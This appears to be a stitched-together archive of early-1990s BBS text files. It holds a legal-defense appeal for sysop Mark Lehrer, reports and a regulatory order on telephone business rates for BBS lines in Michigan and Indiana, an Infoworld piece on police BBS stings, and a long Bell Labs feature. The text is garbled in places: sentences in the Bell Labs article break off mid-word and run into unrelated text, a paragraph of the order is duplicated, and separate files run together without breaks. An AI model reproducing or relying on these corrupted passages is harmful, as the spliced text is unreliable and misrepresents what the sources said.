the police or a prosecutor want to intimidate a BBS, snoop through
users' electronic mail, or "just appropriate someone's computer for
their own use."

You, the reader, probably know a sysop like Mark Lehrer. You and
your family have probably enjoyed the benefits of BBS'ing. You may
even have put one over on a busy sysop now and then.

In this case; the sysop is a sober and responsible college student,
studying computer science and working to put himself through
school. He kept his board a lot cleaner than could be reasonably 
expected, so much so that the prosecution can find very little to
fault him for.


*Important*  Please consider a small contribution to ensure a fair
trial and precedent, with standards of evidence upheld, so that
mere possession of a computer is not grounds for a witch hunt.

These issues must not be decided by the tactics of a 'war of
attrition'; *however far* in the court system this needs to go. For
this reason, an independent, legal defense trust fund has been set
up by concerned area computer users, CPA's, attorneys,etc.

     Mark Lehrer First Amendment Legal Defense Fund
                         (or just:  MLFALDF)
     Lockbox No. 901287
     Cleveland, OH  44190-1287

*All* unused defense funds go to the Electronic Frontier
Foundation, a nonprofit, 501c3 organization, to defend BBS's and
First Amendment rights.

Help get the word out. If you're not sure about all this, ask your
local sysops what this precedent could mean, who the EFF is--and
ask them to keep you informed of further developments in this case. 
Please copy this file and send it to whoever may be interested. 
This case *needs* to be watchdogged.

Please send any questions, ideas or comments directly to the sysop:

Mark Lehrer
CompuServe: 71756,2116   InterNet: 71756.2116@compuserve.com
Modem: (216) 688-6383    USPO: P.O. Box 275           
                               Munroe Falls, OH  44262

----------------------------------------------------------------------
The Sysops' Sig received this letter from the Lehrer defense people,
with a request that their side of the story be made available to
Free-net users. DISCLAIMER: The Sysops' Sig takes no position on this
case, since each Free-net sysop speaks for himself/herself.
----------------------------------------------------------------------

FOOTNOTE: The above says the framers of the Constitution weren't aware of BBSs
          when drafting the Constitution....to this I say-THEN WHAT IS FREEDOM?
          The Constitution's 1st Amendment and the 9th Amendment clearly
          addresses this issue. This case is another case of the actual "police
          power" against Americans.
          There is NO crime here! There is NO property damaged and there is NO
          human victim here. Then there should be NO crime but our present
          system has the power to invent a crime which is exactly what is going
          on here.
          PLEASE contribute monetarily or at least in writing to Mark Lehrer at
          the above address. Send proof of such contribution and a 3 months 
          FREE access will be granted by "HOME" BBS at (909) 735-2573.
          Can YOU PLEASE Help STOP more loss of our guaranteed FREEDOMS?About litigation involving BBSs in USA.

On January 29th and 31st, a hearing will be held before an
administrative law judge concerning the case of the Variety & Spice
BBS (Gross Point, MI) and Michigan Bell.  In March, Michigan Bell
informed the sysop that they would begin charging him business rates
for his phone lines because they determined that his charging for
access does not qualify him for residencial rates.

Several cases of this nature have, or are currently being faught
around the country.  These files are being circulated to inform those
who use or run BBS's of pending legislation in Michigan and Indiana. 

For more information, or if you would like to testify before the MPSC
on the above date, please contact one of the following sources.

Jerry Cross (voice)313-736-4544
            (bbs)  313-736-3920

Variety & Spice BBS
                   313-885-8377

or check out one of the many Michigan BBS's that carry the Michigan
ECHO message system.  

Please send comments or questions to 
    G.Cross (Genie)
    JERRYCROSS (DELPHI)
    75046,467 (CompuServe)


Thanks for your support!


*** Now read this  ***

GTE TAKES ON INDIANA SYSOPS

  (April 5)
  Unilateral imposition of business rates on Bulletin Board Systems
continues to spread. BBS operators in Indiana complain that GTE is
forcing them to accept extra-cost business rates rather than the
residential rates they have been paying.
  Derry Nelson, sysop of the 1149 BBS in Elkhart, Ind., says that the
changes were a surprise.  The worst part of the surprise seems to be the
large jump in monthly rates.  A typical BBS would find its monthly bill
increased by almost 200 percent.
  "To the best of my knowledge the BBS Community was not aware of the
changes GTE requested in their [new] tariff," Nelson said.  "I know that
I personally wasn't aware of anything until I received a letter from GTE
stating that my rate classification was being changed from Residential to
Business.  I honestly believe that this [tariff] was `slipped' through."
  The Indiana Utility Regulatory Commission (IURC) told Nelson and other
sysops that a tariff approving business rates for home computer lines was
approved in January.  The consensus among ELkhart BBS operators seems to
be that the tariff should have considered in open and publicized hearings.
  The new tariff appears to give GTE wide-ranging control over its
customers.  As an example, the company can limit the length of calls "when
in [GTE's] judgement such action is necessary." GTE claims authority to
change a BBS to business rates because the service is provided "for use
[of] the general public."
  Additional information is available from the Utility Consumer Counselor
at 317/232-2494.  The 1149 BBS can be reached at 219/293-1149.
  --James Moran

----------
FROM:    Mike Marotta                  Area # 9 (     Michigan     )
TO:      Bbs Users                     MSG # 130, Apr-7-90 0:31am
SUBJECT: Why Business Rates

        These excerpts are from MPSC documents.  It is established in
        regulatory commission administrative law that the PROVIDER files
        a tariff.  For instance, it is a principle of regulatory law that
        a tariff cannot be effective prior to its filing date.  A tariff
        that allowed this would "jump out" at a regulator who read it.
        Generally, however, the regulators ACCEPT the filing of the
        carrier and leave it to competing carriers or clients to file a
        complaint.
        -----------------------------------------------------------------
        Michigan Bell Telephone Company Tariff MPSC No. 7 was issued on
        November 21, 1966.  Its age alone speaks volumes.

        <quote> "Original Sheet 11.
        GENERAL REGULATIONS
        CLASSIFICATION AND USE OF TELEPHONE SERVICES

        A. APPLICATION IS BUSINESS AND RESIDENCE RATES (Formerly Sheet
        15)
        1. The determination as to whether telephone service is Business
        or Residence is based on the character of the Use to be made of
        the service.  Service is classified as business service where the
        use is primarily or substantially of a business, professional,
        institutional, or otherwise occupational nature.  Where the
        business use, if any, is incidental and where the major use is of
        a social or domestic nature, service is classified as residence
        service if installed in a residence.

        "2. Business rates apply at the following locations, among
        others:
        a. In offices, stores and factories, and in quarters occupied by
        clubs, lodges, fraternal societies, schools, colleges, libraries,
        hospitals and other business establishments.
        b. In residence locations where the place of residence is in the
        immediate proximity to a place of business and it is evident that
        the telephone in the residence is or will be used for business
        purposes; and in the residence locations where an extension is
        located at a place where business rates would apply.
        c. In the residence of a practicing physician, dentist,
        veterinary, surgeon or other medical practioner who has no
        service at business rates at another location.
        d. In any residence location where there is substantial business
        use of the service and the customer has no service elsewhere at
        business rates.

        "B.1.a.(2). A customer engaged in furnishing services of a
        secretarial nature may not use Telephone Company facilities to
        receive messages for one party to be forwarded to another party,
        unless such forwarding is of a temporary or occasional nature."
        <end quote>

---

FROM:    Mike Marotta                  Area # 9 (     Michigan     )
TO:      All Bbs users                 MSG # 131, Apr-7-90 0:32am
SUBJECT: more on rates - 2

        As a result of the "Variety and Spice BBS" incident of March
        1990, the MPSC issued a statement. Excepts follow:
        <quote>"FORM LETTER FOR COMPUTER BULLETIN BOARDS

        "If bulletin boards or access to bulletin boards is provided to
        calling parties at no charge other than that which may be
        associated with the telephone call, and are not provided in
        conjunction with a business, a profession, an institution or
        other occupation, then it would appear that the service should
        not be classified as a business.  If, however, there is a charge
        associated with any level of access to the bulletin board,
        whether the charge is rendered to cover costs or produce a
        profit, then the service would be considered a business or
        classification as such.  This would also apply if any of the
        previous conditions mentioned were not met."  <END QUOTE>


FROM:    Mike Marotta                  Area # 9 (     Michigan     )
TO:      All Users                     MSG # 134, Apr-7-90 0:25am
SUBJECT: Michigan Bell and You

        04/06/1990  This statement was specially prepared by Michigan
        Bell to explain to the bulletin board user community their
        position on the question of business rates.  The statement was
        given to me at my request by Michigan Bell's district manager for
        state government. -- Mike Marotta.

        <quote>"Telephone Service Classifications

        "Recently the question has arisen whether Michigan Bell is
        attempting to charge commercial rates to all computer bulletin
        boards in the state.  Michigan Bell has not instituted a
        "program" to impose a specific class of service on any group of
        customers, i.e., computer bulletin boards.  In fact, the decision
        on which class of service is required for computer bulletin
        boards is no different than it is for any other service.  In
        making the decision, Michigan Bell is required to comply with
        tariffs approved by the Michigan Public Service Commission, which
        cover the matter of appropriate classification of telephone
        service.

        "The applicable tariffs require Michigan Bell to classify service
        primarily in accordance with the use that is to be made of the
        service.  The tariffs specify the conditions under which a
        service is classified, for rate purposes, as business or
        residence service.  For example, service is classified as
        business where the use is primarily that of a business.  In the
        case of computer bulletin boards, for instance, is there is a
        charge associated with any level of access to the board, or money
        is solicited in conjunction with the board, that is considered
        conducting a business within the meaning of Michigan Bell's
        tariffs.  The service, therefore, would be classified as business
        and business rates would apply.  On the other hand, service that
        is used primarly for domestic purposes is classified as residence
        service.  Again, using the example of computer bulletin boards,
        if the board is not associated with a business and no charge is
        assessed or solicited for access to the board, then service may
        be classified as residence in accordance with the application
        tariffs." <quote>


*** And this ***

                       STATE OF INDIANA

           INDIANA UTILITY REGULATORY COMMISSION

IN THE MATTER OF THE COMPLAINT OF     )
TEN INDIVIDUALS AGAINST GTE NORTH     )     CAUSE NO. 39005
INCORPORATED PERTINENT TO CERTAIN     )
CHARGES FOR TELEPHONE SERVICE         )
RENDERED BY GTE NORTH INCORPORATED    )

BY THE COMMISSION:
__________________

James R. Monk, Chairman
Mark W. Cooper, Chief Administrative Law Judge

        On June4,  1990,  Randy Wilson, Derald A. Nelson, Clamies J.
Lambright, David A. Reynolds,  Thomas Battler,  Don Billey,  Jeff
Jacobs, Jean Ludwig, George Himebaugh, Jr., and Delmar Mineard, Jr.
(Complainants") filed a complaint with the Commission pursuant to IC
8-1-2-54 against GTE North Incorporated ("Respondent").  By their
complaint, the Complainants state that certain of the provisions of the
Respondent's tariffs on file with this Commission are unjustly
discriminatory and unreasonable to the Complainants" detriment.

        Pursuant to notice duly published as required by law, a
Prehearing Conference was held in this Cause on July 27, 1990 at 1:30
P.M., EST, in Room 908, State Office Building, Indianapolis, Indiana.
At the Prehearing Conference, the parties informally agreed as to
procedural and scheduling matters to be operative in this Cause.
However,  counsel for the Respondent indicated that it would be
subsequently submitting a motion to dismiss herein and the Commission
withheld the issuance of the Prehearing Conference Order pending the
submission and ruling upon Respondent's Motion to Dismiss.

        On August 10, 1990, the Respondent filed its Answer and Motion
to Dismiss, which filing appears in the following words and figures,
to-wit:

                          (H.I.)

        Based upon the applicable law and the filings of the parties,
the Commission now finds as follows:

        1.  Commission Jurisdiction.  The Respondent is a "public
utility" within the meaning of the Public Service Commission Act, as
amended.  IC 8-1-2-54 provides the complaints may be filed against
public utilities with the Commission pertinent to the practices and acts
of those utilities.  The complaint initiating this Cause was filed under
the provisions of IC 8-1-2-54 and appears to satisfy the requirements
thereof.  The Prehearing Conference was conducted pursuant to notice
duly published as required by law.  IC 8-1-2 et seq.  and the
Commission's Rules and Regulations of Practice provide the Commission
with the authority to appropriatley adjudicate and dispose of cases
pending before it.  Therefore, the Commission has jurisdiction over the
parties and subject matter herein.

        2.  Commission Discussion and Findings.  The Complainants allege
that certain provisions of Respondent's tariffs are unjustly
discriminatory and unreasonable and the Complainants have been caused
harm thereby.  The Complainants state that they are customers of the
Respondent and are engaged in the hobby of operating a Computer Bulletin
Board System ("BBS").  The Complainants allege that pursuant to these
tariff provisions the Respondent is billing them at a business rate
rather that a residential rate whic is inappropriate and to their
detriment.  The Complainants contend that the operation of a BBS is a
hobby and not a business venture.  The Complainants also contend that
applying a business rate to them consititutes a rate change which must
be subjected to public hearing prior to the application thereof.
Respondent points out that the tariff complained of by the Complainants
was approved by the Commission on January 31, 1990 pursuant to IC
8-1-2-42.  Respondent also points out there is no dispute between the
parties as to whether this is the appropriate tariff under which the
Complaintant's service should be provided.  Complainant citees certain
language set forth at Section 6.5 of the tariff which reads, as follows:

        The Company shall determine if business or residence rates apply
to a customer service.

        Respondent goes on to set forth additional language from the
tariif which set forth situations under which a business reate is
properly applied.  Respondent concludes that BBS clearly fits the
categories set forth by the tariff under which a business rate applies

        Respondent goes on to set forth additional language from the
tariif which set forth situations under which a business reate is
properly applied.  Respondent concludes that BBS clearly fits the
categories set forth by the tariff under which a business rate applies
and the fact that Complainants allege that BBS is a hobby does not
remove it from the categories as defined within the tariff.

        Respondent's Motion to Dismis does not clearly set forth the
authority or rule under which the Motion is brought.  Therefore, we must
first determine the precise character of the Motion that we may know the
criteria under which its propriety is to be considered.  Although
Respondent's filing is denominated as a "Motion to Dismiss", a review of
that Motion reveals that it does not clearly fall within the parameters
of the familiar request for involuntary dimissal under T.R. 41 or
matters properly raised under T.R. 12 (B).  It appears that Respondent's
filing is most akin to a Motion for Judgement on the Pleadings as
provided by T.R. 12(C) or a Motion for Summary Judgement pursuant to
t.R. 56.  In any event, a review of T.R. 12(C) directs that a motion
brought under that rule in circumstances such as these should be treated
as one for summary judgement and be disposed of as provided by T.R. 56.
T.R. 56(C) sets forth the standard under which a moving party may
prevail on motion for summary judgement.  The Rule provides that the
judgement sought shall be rendered if there is no genuine issue as to
any material fact and that the moving party is entitled to a judgement
as a matter of law.  This standard appears to be applicable in this
situation.  A review of the Complaint and Respondent's filing indicates
that the parties agree upn the operative facts and that there exist no
genuine dispute as to any material fact.  The question remaining to the
Commission is no then fact sensitive but whether Respondent's tariif
provisions which allows the Respondent to bill the Complainants under a
business rate constitutes the improper charging of a reate without prior
Commission approval and/or whether that tariff provision is unjust and
discriminatory.  Both of which are conclusions of law for the Commission
as contemplated by T.R. 56 (C).

        The Complainants allege that the Respondent's application of a
business rate to the Complainants constitutes a rate change for which
prior Commission approval must be obtained after holding a public
hearing.  The cleand and unambiguous terminology of Respondent's tarriff
which was approved by this Commission allows the Respondent to determine
wheter a particular service is appropriatley billed under a residence
rate or a business rate.  Clearly the tariff approved by the Commission
authorizes the appropriate rate.  The Complainants have not alleged that
Respondent acted in a fashion inconsistent with the tariff.  Therefore,
when information comes to the Respondent that leads it to believe that a
particular customer's situation has changed it is authorized under the
tariff to impose a rate change consistent with the terms of the tariff.
The Respondent's review of circumstances and decision to impose a
different rate authorized under the tariff clearly does not constitute a
rate change as contemplated by IC 8-1-2-42.  Therefore, considering the
undisputed facts the Complainants would not be entitled to prevail on
this issue.

        The Complainants next allege, without specifically stating the
reasons therefor, that Respondents tariff in question is unreasonably
discriminatory.  This Commission has for many decades been charged with
the duty to review utility tariffs under the mandate that utility
services should not be discriminator and must serve puble interest.  A
review of the official files of the Commission disclosed the provisions
of Respondent's tariff in question are of a standard type and kind for
local exchange telephone service.  Further, we note that such tariff
provisons were reviewed by the Commission's Engineering Division which
was properly delegated with the authority to consider the propriety of
that tariff and make ultimate approval or rejection thereof.  Base upon
a review of Respondent's tariff, we find that the tariff provisions are
not unreasonable and discriminatory either as written or by their
application.  Therefore, we find that the Complainants are not entitled
to prevail upon this issue as a matter of law.

        Based on forgoing, we find that Summary Judgement should be
granted in favor of the Respondent and the Complaintants request to
investigate the acts, practices and rates of the Respondent and for the
holding of public hearing on the matter of the imposition of a business
rate to the Complainants should be DENIED.

        IT IS THEREFORE ORDERED BY THE INDIANA UTILITY REGULATORY
COMMISSION THAT:

        1. The Respondent shall be deemed to have prevailed on the
matters at issue herein and that Complaintants request for an
investigation into the acts, practices and rates of the Respondent and
the holding of public hearing upon the Respondent's imposition of a
business rate upon the Complainants shall be, and hereby DENIED.

        2.  This Order shall be effective on and after the date of its
approval.

                        NOV 21, 1990


-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-

                      POLICE SET UP BULLETIN BOARD STINGS


By Jim Forbes
Infoworld Staff

AUSTIN, TX - Law enforcement officials here have joined a growing number of
police agencies nationwide running "sting" operations to catch persons using
bulletin boards for illegal purposes.

   Based on information posted on a bulletin board it operated, the Austin
Police Department said it has been able to turn off two pirate boards here and
expects shortly to make a number of arrests for misdemeanor violations of
Texas' newly enacted computer crime law.

   For more than two years, the department secretly ran a board called the
Underground Tunnel, which was set up to appear as a bulletin board run by a
system operator called Pluto.  But late last month - to the surprise of the
board's more than 1,000 users - Pluto was revealed as Sgt. Robert Ansley, a
seven-year veteran of the police department.

   "Most of the users were people interested primarily in several on-line
fantasy games or in electronic messaging," Ansley said.  "To get to the levels
where people posted information on how to crash corporate systems, the user had
to ask for increased access.  We were very careful not to solicit or entrap
anyone into leaving illegal information."

   The Austin police department disclosure caught most of the board's users by
surprise.  "I liked the board's electronic messaging capabilities," said user
Michael Whalen, the managing editor of the Daily Texan, the student newspaper
of the University of Texas here.  "I was really surprised at how the officer
was able to pull this off."

   What the police found, according to Ansley, included access codes belonging
to the world's largest credit reporting organization, TRW Information Services
Systems Division of Orange, California.  "Most offenders seem to be real big on
TRW," said Ansley.

   Sting and intelligence gathering bulletin board operations are on the rise
throughout the country, according to law enforcement officials.  Several police
departments nationwide have already used bulletin boards to track down and
arrest microcomputer users who post illegally obtained calling card codes,
mainframe access procedures and passwords, or other confidential information.
According to one high-lvel West Coast law enforcement officer who declined to
be identified, federal officials are now joining local authorities in running
bulletin boards in several key metropolitan areas.

   "You better believe law enforcement agencies are interested and, in some
cases, running bulletin boards," said Dan Pasquale, a sergeant with the
Fremont, California, police department.  Last month, police in Fremont capped
three and a half months of bulletin board operations by arresting eight
individuals for alleged credit card fraud, misuse of telephone credit card
operations, and technical trespass.  Pasquale said most corporations whose
passwords or calling card numbers were posted on Fremont's board were unaware
that their information had been compromised.

   Although police are pleased with their results, some users say they feel the
sting bulletin boards are unfair to both innocent users and suspected criminals
alike.  Whalen said students at the University of Texas used the board
extensively, and he claimed that some people accused of posting access codes
and other information on the board felt they had been entrapped when they
discovered that the board was a police sting operation.

   Whalen also said that some users where concerned about the privacy and
sanctity of electronic mail left on the board.  "Ansley said users are foolish
if they don't think a system operator reads the mail on the board," he added.

   Indeed, as police turn increasingly to bulletin boards to catch suspected
criminals, the issue of entrapment has also become a growing concern, one to
which police are sensitive.

   "At no time did the police department urge users to leave access codes,
applications, or passwords for corporate computers on the Tunnel," Ansley said.

   To prove entrapment, a suspect would have to cleary show that a government
agent offered some type of inducement to promote criminal activity, said Jim
Harrington, the legal director of the Texas Civil Liverties Union here.  "The
whole are of police gaining information on [criminal activities] by reading
electronic mail is very interesting."

   Fremont police held a series of meetings with a district attorney before
they started the board, according to Pasquale.  "We established a point where
entrapment began and made sure we never crossed that point," he said.  "In
fact, messages on the board were scripted in conjunction with the district
attorney's office."

-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-

Downloaded From P-80 Systems 304-744-2253

  WHAT DOES A NOBEL PRIZE FOR RADIO ASTRONOMY HAVE TO DO WITH YOUR TELEPHONE?
                                       
   It's been a decade since the breakup of AT&T. Has the spirit passed
   out of its Bell Labs, as some charge? Or is it still the preeminent
   technology lab in the US, only "more nimble, more intelligent"?
   
   By Richard Rapaport
     _________________________________________________________________
   
   
   
   Edward Eckert walks through a storage area behind a yellow
   corrugated-metal warehouse set off a wooded road in piney Warren, New
   Jersey. He presses ahead, into a cold storage area filled by a
   room-sized mobile file cabinet, set on tracks. This is the archive of
   Bell Laboratories, the near-mythological research arm of American
   Telephone & Telegraph. Spinning a lever that opens the space between
   two of the 7-foot-high files, Eckert pulls out an inexpensive black
   Naugahyde case, the kind you can buy at Woolworth's for 15 bucks. He
   unzips the case and fishes out an ancient, fraying 3-inch-by-5-inch
   notebook in purple alligator-patterned leather. Opening it, he
   delicately pages through.
   
   The notebook's yellow-gray pages are lined with faded green ink and
   begin with a penciled date, February 1876. Only the first 20 pages of
   the notebook are used, filled with the minutiae of a young Boston
   laboratory assistant named Thomas Watson, who made his recordings
   during the winter of the American Centennial. There are a few simple
   sketches of electrical devices - switches and the like. There is a
   list of expenses that the frugal 22-year-old incurred during that
   winter: "tooth powder - 35," "ice - 10," and even an entry for
   "drawers - 1."
   
   Cradling the notebook, Eckert turns to the fourth page. At the top is
   the date - March 10, 1876. Below, in tiny script, are seven words that
   are among the most momentous in the annals of science: "Mr. Watson
   come here I want you."
   
   Such were the words of Watson's employer, a 29-year-old Scottish-born
   inventor named Alexander Graham Bell. They were spoken from one room
   to another in Bell's laboratory at 5 Exeter Place. The tale is a
   staple of scientific lore: Bell really did need Watson, having just
   spilled acid on himself. More importantly, his call for help was the
   very first electrically transmitted message spoken over Bell's
   instrument, soon and forever after known as the telephone.
   
   Other entries on the fourth page of Watson's notebook record more of
   that day's prosaic, yet epochal communication. "How do you do," Watson
   chronicles. "God save the Queen and several other articulated
   sentences," is the final, triumphant entry on the page of the aged
   notebook, only one of many rarely viewed prizes tucked away in this
   nondescript warehouse in a clearing carved out of the New Jersey
   woods.
   
   The artifacts collected here catalog the output of Mr. Watson and his
   descendants, the thousands of scientists who, throughout most of this
   century, gave Bell Labs nearly as much of a monopoly on scientific
   innovation as its parent, AT&T, had on international communications.
   
   The caged and locked holds in the Warren warehouse smack palpably of
   the Raiders of the Lost Ark, containing as they do prototypes that do
   nothing less than define the course of our technological century.
   There, in boxes, is the world's first carbon dioxide laser; on a dusty
   table sits the original quartz clock; on a shelf rests the telephone
   on which the first transatlantic call was made; scattered about are a
   pilot's helmet used for the first ground-to-air radio transmission, an
   early loudspeaker used at President Warren G. Harding's inauguration,
   the world's first solar battery, and the original artificial larynx.
   
   The archive is the resting place for quaint technological failures as
   well - items like the sadly aged 1954 prototype Picture Phone. Then
   there are the objects whose ubiquity underscores their importance: the
   coffin telephone booth, the black 500 Series Western Electric
   telephone (it once graced every office and home in America), and the
   green, orange, blue, and white versions of the mod, quintessentially
   '60s Princess phone.
   
   But here in Mother Bell's basement, the most awesome artifacts of all
   are the more than 100,000 scientific notebooks - tucked away in row
   after two-story, pre-fab, metal-frame row - that hold the notations of
   Bell Labs scientists, modern-day Leonardos whose theories,
   discoveries, and inventions have immeasurably altered humanity.
   
   Since its formal incorporation in 1925, Bell Labs's scientific
   fraternity represents a Who's Who of international research. It
   includes seven Nobel Prize winners: William Shockley, Walter Brattain,
   and John Bardeen, inventors of the transistor; Clinton Davisson, who
   demonstrated the wave nature of matter; Arno Penzias and Robert
   Wilson, whose work in radio astronomy confirmed the big-bang theory;
   and Philip Anderson, for his work on the deep atomic structures of
   metals.
   
   Notes of the basic research of these Nobel laureates and other
   scientific giants make the Bell Labs archive a veritable pantheon of
   technological achievement. There is the work of Claude Shannon, whose
   seminal information theory provided the framework for computer
   programming; the research of William Pfann, whose "zone refining"
   process made possible the mass production of semiconductors; the
   formulations of Alfred Cho, whose molecular beam epitaxy allowed
   microprocessors to shrink to undreamed-of size and complexity. There
   are the scribblings of Ken Thompson, who, along with Dennis Ritchie,
   developed Unix, the first cross-platform computer operating system;
   and the notebooks of Bjarne Stroustrup, father of the key programming
   language C++.
   
   The archive, in total, houses the intellectual foundations of more
   than 25,000 patents, nearly one for each day of Bell Labs's existence.
   It is an outpouring of scientific innovation that -- in its
   breathtaking variety and willingness to push beyond the temporal world
   of telephony - has more than lived up to Alexander Graham Bell's
   refreshing exhortation: "Leave the beaten path and dive into the
   woods."
   
   Bell's dictum is carved into the pedestal of his bust in the lobby of
   the sprawling Murray Hill, New Jersey, compound, one of a cluster of
   campuses where many of Bell Labs's 25,000 employees work - all within
   an hour of the institution's original New York home. But if Bell's
   words are cast in stone, much has changed since the time when the
   steely monopoly that controlled - nay, owned - virtually every phone,
   line, pole, switching station, and PBX in America, showered its
   largesse upon Bell Labs, making it, according to one executive, "the
   world's best university." If Bell Labs's university lacks students, it
   comes complete with in-house physics, art, radio-astronomy,
   astrophysics, and its own economics department.
   
   The golden age of pure research at Bell Labs began in the mid-'30s,
   when the search for a solid-state device to replace the vacuum tube
   began. It was a spirited period when, one former scientist recalls,
   "people rode unicycles in the halls and invented mind-reading
   machines." It lasted into the late '50s, when Sputnik-phobia drafted
   Bell Labs into the Cold War, even as it remained a bastion of reason
   and safety against the loyalty oaths that were requisite in many
   American institutions for years during the frenzy of McCarthyism.
   
   Though staff sizes and budgets remained generous afterward, subtle
   changes in mission and status came along with the anti-establishment,
   anti-scientific Luddism of the late '60s. Regulatory hearings into
   Bell system rate-making in the '70s further diminished its hegemony.
   Then came the 1982 federal court consent decree that broke up the Bell
   system, awarding Bell Labs to AT&T, while setting up a parallel
   organization, Bellcore, as the research wing of the so-called "Baby
   Bells." The transformation accelerated during subsequent internal
   reformations at AT&T, as the company slowly moved away from its
   research orientation and sought to evolve from ponderous scientific
   sovereign into successful business and technology competitor.
   
   In his searching 1984 book on Bell Labs, Three Degrees Above Zero,
   Jeremy Bernstein posed a troubling scenario about the effect AT&T's
   breakup would have on the scientific crown jewel that was Bell Labs.
   "Clearly with the divestiture," Bernstein wrote, "Bell Laboratories is
   at a watershed. If all goes well it can continue its great tradition
   of basic and applied research, and if things do not go well it runs
   the risk of becoming just another large, conventional industrial
   laboratory."
   
   Has the past decade written the dnouement in the drama of Bell
   Laboratories's event-horizon research? Other phone companies, like MCI
   and Sprint, have become profitable and competitive - while providing
   little or none of their own basic research - and have cut into the
   AT&T profit margins that fund Bell Labs. Bell Labs nevertheless
   remains a scientific hothouse, with a US$3 billion total budget - $2.7
   billion for development and $300 million for research. It is the
   richest and largest private research lab in the world, still leading
   in fields as diverse as photonics, fiber optics, HDTV, artificial
   intelligence, cellular telephony, digital radio, and computer
   software.
   
   Still, Bernstein's decade-old rumination resonates with some veteran
   Bell Labs scientists and executives, who are steeped in the Labs's
   research tradition and watch each change with some trepidation. Are
   things going grandly? In the words of current vice president for
   research and Nobel laureate Arno Penzias, is "the company more nimble,
   the academy more intelligent"?
   
   Or has Bell Labs conceded its preeminence in basic science, opting
   instead for the kinds of business-driven technological innovations
   that can come to term in months instead of years or decades; has the
   institution opted, in other words, against the lightness of the
   scientific and toward the gravitational pull of the commercial?
   
   Bob Lucky, Arno Penzias's counterpart at Bellcore, believes the
   latter. Lucky, who served at Bell Labs for 31 years, is one of a
   number of "old-timers" who longs for "the golden years," believing
   that "the spirit has gone out of the place, a spirit whose passing
   people mourn."
   
   Lucky is quick to point out that many of the changes at Bell Labs were
   necessitated by AT&T's own deregulated, diminished status. And he
   lauds the current AT&T chair, Bob Allen, for fighting hard for the
   Labs US funding and staffing. But with a new president, Daniel
   Stanzione, just beginning his administration, Lucky and others wonder
   if Bell Labs is not necessarily in for a downsizing or a restructuring
   that will see an increasing number of scientists attached directly to
   business units rather than remaining in independent research groups.
   
   For his part, Stanzione tries to answer Bernstein's question by
   talking reassuringly about maintaining Bell Labs's historic commitment
   to scientific independence. "We have continued the tradition of both
   ba
   "I find it hard to believe that people who are idea-driven are not
   entrepreneurs today," Waring Partridge, AT&T's WASPily articulate vice
   president for multimedia strategy, suggests over mid-morning coffee.
   We are sitting in an empty cafeteria within the central atrium of the
   sprawling, brown-brick cluster that is Bell Laboratories's Murray Hill
   campus. Partridge, whose group brings to market AT&T consumer
   multimedia services, has come over from his Basking Ridge offices to
   tap some of the rich Bell Labs brainpower, as well as to talk with me
   about what he sees as the "new tradition" of AT&T business/science
   dual citizenship - a trend that has seen many once-independent Bell
   Labs researchers go to work directly for AT&T business units.
   
   Partridge is a new phenomenon at AT&T. He is an entrepreneur, a former
   McKinsey management consultant and the founder of small
   telecommunications, paging, and cable companies. "Instead of picking
   up my chips and playing golf," he says, he decided, at the age of 49,
   to sign on to one of the world's least entrepreneurial
   mega-corporations. "In the '80s, I said I'd never work for AT&T,"
   Partridge recalls about a company that, to his mind, is still
   "commercially underdeveloped."
   
   But when Partridge, who looks and sounds a bit like a techno-George
   Plimpton, finally did take a look at the new, deregulated AT&T, he
   liked what he saw: for starters, a company spending $3 billion a year
   on software alone, with the resources and staying power to force what
   he believes will be the technology passage to the future: the
   convergence of telecommunications, broadcasting, and computing. Like
   many of his AT&T colleagues, when Partridge looks at such soon-upon-us
   wonders as interactive TV, he doesn't see television, he sees
   telephone.
   
   During his four years with AT&T, Partridge has become a Bell Labs
   partisan. It is, he says, the kind of place "I go for ideas." But
   Partridge is cd down
   the halls, banging on executives' doors, bringing them into the
   conference room to give Vistium a try.
   
   Throughout the conversation, Partridge returns to one point: the
   successful technology company of the future will likely emerge, not
   from the computer industry, with its vested interest in the
   microprocessor box, but from the telecommunications industry, with its
   tradition of networking and interoperability. He also believes that
   AT&T's long-standing "plug and play" credo, which eschews instruction
   booklets, will be the successful future technological research and
   development paradigm. "Most things that succeed," he suggests drolly,
   "don't require retraining 250 million people."
   
  The great intelligence of the network
  
   
   
   Waring Partridge's point is also Eric Sumner's. Sumner is
   demonstrating the Sage Project - recently rechristened the more
   commercial "AT&T TV Information Center" - in a comfortable, gray- and
   cranberry-accented loud fluster the average PC user in Sumner's demo.
   With the push of a button, the TV Information Center can record,
   store, and then visually render telephone messages or faxes; it can be
   programmed to automatically dial up and store voice and text services;
   it can give an instant readout on all the day's relevant stats -
   before you've even brewed your morning coffee, something it cannot do.
   
   
   The Information Center's simplicity - you plug a black box into a
   phone jack and then into your television - is hardly accidental.
   Technological "ease of use," to borrow the jargon, is a major, perhaps
   the major, new Bell Labs paradigm. Retiring Labs president John Mayo
   compares its importance to "improving the efficiency of the vacuum
   tube in the '40s."
   
   Sumner once worked under Mayo at the Labs, but transferred to the AT&T
   consumer side when, he says, "a cool new head of consumer products
   brought me over here." But he didn't exactly leave Bell Labs behind:
   he forages there frequently, "looking for what needs to be built, and
   then wandering the halls looking for someone to build it."
   
   Sumner has found a collaborator in Thaddeus Kowalski, chief architect
   for products, into whose PC- and circuit-board-strewn lab we wander
   after the TV Information Center demonstration. "This shop allows more
   practical people to have an effect," the stocky, intense Kowalski says
   about products that have come out of his laboratory, as he catalogs
   existing pieces of Bell Labs technology that went into the Information
   Center. "We borrowed the graphics, we lifted the computer codes
   wholesale, and we already have the best transmission and
   file-compression techniques," he says. He winds up echoing the typical
   Bell Labs attitude: "People in the research area had all sorts of
   technology, and they were eager to get it out."
   
   Kowalski and Sumner are especially jazzed about another Sage Project
   product that will allow the so  
   Plan 9, the system, not the movie, is a descendant of Unix. It is a
   shell program that allows different and differently programmed devices
   the freedom to network and process distributively in the simplest and
   most economical way ever.
   
   Allowing transparent distributed processing over a network, Plan 9
   already drives such products as the TV Information Center and AT&T's
   World Wide Web 800-number directory. It will, according to Ritchie,
   give users the freedom to work simultaneously with different
   processing activities taking place in varying locations, but, to the
   user, still be part of a unified activity. This is handy, he explains,
   because "sometimes it's better for the data to be near the CPU and
   sometimes it's better - in graphics, for example - to be near the
   user." With Plan 9, the user is unconscious of where the processing is
